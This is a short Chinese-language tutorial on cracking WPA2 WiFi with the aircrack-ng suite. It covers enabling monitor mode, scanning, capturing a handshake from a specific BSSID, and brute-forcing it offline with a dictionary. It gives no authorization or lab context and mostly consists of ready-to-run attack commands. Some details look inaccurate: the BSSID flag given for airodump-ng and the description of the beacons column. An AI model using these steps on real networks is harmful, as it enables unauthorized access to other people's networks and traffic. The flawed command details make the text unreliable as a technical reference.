WiFi 监听与安全破解
WiFi 监听与安全破解技术流程
首先,需要确认 WIFI 网卡是否支持监听功能。在终端中查看,如果没有 phy0 这一行,说明当前的网卡不支持监听功能,也就不具备破解 WIFI 的硬件基础。
ifconfig # 查看网络接口的配置
airmon-ng # 查看物理 wlan 网卡是否支持监听 (如 RT3072, RT2800usb)1. 开启 WiFi 监听模式
执行以下命令开启监听功能:
airmon-ng start wlan0
此时再次使用 ifconfig 查看,若发现 wlan0 接口名称变长(例如变为 wlan0mon),则说明无线网卡已成功开启监听功能。
2. 网络扫描
通过 airodump-ng wlan0 进行扫描。当看到目标 SSID 出现后,按 Ctrl+C 停止。注意:抓包必须在设备尝试连接的过程中才能成功获取。
| 参数 | 说明 |
|---|---|
| BSSID | 无线路由器的硬件 MAC 地址(唯一) |
| PWR | 信号强度,数值越大越好 |
| Beacons | 客户端与 AP 的数据交换情况 |
| Data | 传输的数据量 |
| CH | 信道/通道 |
| ENC / CIPHER | 加密协议与方式 (如 WPA2 / CCMP) |
| ESSID | WIFI 名称 |
3. 握手包抓取
握手包只有在用户连接 WiFi 的瞬间才会产生。我们可以通过特定频道定向监控来抓取该数据包:
airodump-ng -b E4:7D:EB:9B:63:14 -c 6 -w /home wlan0
4. 离线破解
字典的质量和强度是破解成功的关键。
使用以下命令载入字典进行爆破:
aircrack-ng -a2 -b E4:7D:EB:9B:63:14 -w /home/pdfpwd.txt /home/E4:7D:EB:9B:63:14.cap此外,也可以使用自动化的 wifite 工具进行破解,它简化了上述所有流程。
